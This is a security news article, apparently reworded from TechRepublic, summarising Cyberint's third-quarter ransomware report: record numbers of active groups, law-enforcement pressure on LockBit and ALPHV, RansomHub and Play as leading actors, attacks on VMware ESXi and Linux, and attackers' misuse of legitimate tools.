The current year has witnessed the highest count of operational ransomware factions on record. In the second quarter, 58 groups targeted global enterprises. Cyberint, a threat intelligence platform provider, reported a slight decrease in the third quarter, with 57 active groups.
Moreover, during Q3, only 58.3% of all detected attacks were attributed to the top 10 ransomware groups. This signifies a surge in the overall number of active groups and a reduction in activity by major players due to successful law enforcement actions against entities like ALPHV and Dispossessor.
Adi Bleih, a security researcher at Cyberint, conveyed to TechRepublic via email: “With the all-time peak in the number of active ransomware groups, businesses now confront heightened threat levels, as each of these competing factions must vie for targets. The rivalry among different ransomware groups has fueled more frequent attacks, giving little room for error on the part of corporate cybersecurity teams.
“Previously unnoticed security vulnerabilities and gaps could swiftly lead to major security incidents now, given the proliferation of ransomware groups actively seeking their next victims across the internet.”
Impact of Law Enforcement Operations on Prominent Ransomware Groups
Separate research conducted by WithSecure revealed that out of the 67 tracked ransomware groups in 2023, 31 were defunct by Q2 2024. NCC Group also documented a year-on-year decline in ransomware attacks in June and July of this year, which experts attributed to the LockBit disruption.
EXAMINE: LockBit Resurfaces as Ransomware Gang Confronts Law Enforcement
Previously dominant in attacks, LockBit targeted almost 60% fewer companies with only 85 attacks in the third quarter compared to the second, as outlined in Cyberint’s report. This quarter marks the group’s lowest count of quarterly attacks in the past eighteen months.
An August analysis from Malwarebytes indicated that LockBit’s share of ransomware attacks decreased from 26% to 20% over the last year, despite a surge in individual attacks.
After a botched cyber attack on Change Healthcare in February, ALPHV, the second most active ransomware group, encountered a setback. The group failed to pay an affiliate their share of the $22 million ransom, leading the affiliate to expose them. Subsequently, ALPHV staged a sham law enforcement intervention and terminated activities.
EXAMINE: Chronology: 15 Remarkable Cyberattacks and Data Breaches
These observations indicate that law enforcement measures are effective against established groups while paving the way for smaller factions. Malwarebytes analysts suggested that new groups “are undoubtedly competing to draw in affiliates and supersede the established forces in the ransomware arena.”
Cyberint analysts expressed optimism about the cascading effect of takedown operations on smaller entities, stating: “As these major operations falter, it is only a matter of time before other large and small ransomware groups take a similar route. The crackdown has constructed a more adversarial environment for these groups, hinting at a fleeting dominance for them.”
Instead of following the upward trend seen in the second quarter, where ransomware attacks rose by nearly 21.5%, the Cyberint researchers identified a 5.5% decrease in the 1,209 cases reported in Q3.
EXAMINE: Global Cyber Attacks Set to Double from 2020 to 2024, Report Suggests
Notably, the leading ransomware group of the quarter was RansomHub, responsible for 16.1% of all cases and targeting 195 new victims. Among its prominent attacks were those on global manufacturer Kawasaki and oil and gas services provider Halliburton. Cyberint analysts indicated that the group likely originated in Russia and maintained ties with former associates of the now-defunct ALPHV group.
Second on the list of active ransomware factions is Play, which affected 89 entities and accounted for 7.9% of all cases. Since June 2022, it has reportedly executed over 560 successful attacks, including a significant one this year that targeted the VMWare ESXi environment.
“Unless obstructed, Play is set to surpass its record of yearly victims in 2024 (301),” the analysts predicted.
Focus on Linux and VMWare ESXi Systems by Ransomware Groups
The Cyberint report highlighted a tendency where ransomware factions are particularly targeting Linux-based systems and VMware ESXi servers.
VMware ESXi serves as a bare-metal hypervisor facilitating the establishment and administration of virtual machines directly on server hardware, potentially including critical servers. Compromising the hypervisor could allow attackers to simultaneously incapacitate multiple virtual machines and eliminate recovery options like snapshots or backups, leading to severe disruptions for a business.
Ransomware groups Play and Cicada3301 have developed ransomware designed specifically for VMWare ESXi servers, while Black Basta has exploited vulnerabilities enabling them to encrypt all the files related to the virtual machines.
EXAMINE:Black Basta Ransomware Hit Over 500 Organizations Worldwide
VMs and other crucial business infrastructure are frequently hosted on Linux systems. This emphasis showcases cyber attackers’ keenness for the substantial payout possible by inflicting extensive harm on corporate networks.
Usage of Custom Malware and Exploitation of Authorized Tools by Attackers
Ransomware groups’ tactics have significantly advanced in the past year, as seen by Cyberint researchers detecting attackers leveraging custom malware to bypass security measures. An instance of this is the Black Basta gang utilizing several bespoke tools upon infiltrating targeted environments.
Additionally, attackers are leveraging legitimate security and cloud storage solutions to avoid detection. RansomHub was identified using Kaspersky’s TDSSKiller rootkit remover to deactivate endpoint detection and response capabilities and the LaZagne password retrieval tool to gather credentials. Moreover, several factions have employed Microsoft’s Azure Storage Explorer and AzCopy tools for pilfering corporate data and housing it in cloud-based infrastructures.
TechRepublic was informed by Bleih: “As these syndicates achieve greater success and resources, they enhance their sophistication and business practices to mirror legitimate enterprises. While common attack vectors such as phishing schemes, credential theft, and exploiting vulnerabilities in publicly-accessible assets are still prevalent, the innovation in how they execute these methods is growing.
“They are also gaining in agility and scalability. For example, even though threat actors have always possessed technical prowess, they are now capable of exploiting new vulnerabilities at a large scale merely days after a critical CVE is disclosed. Previously, this process could have taken weeks or even more.”
About Author
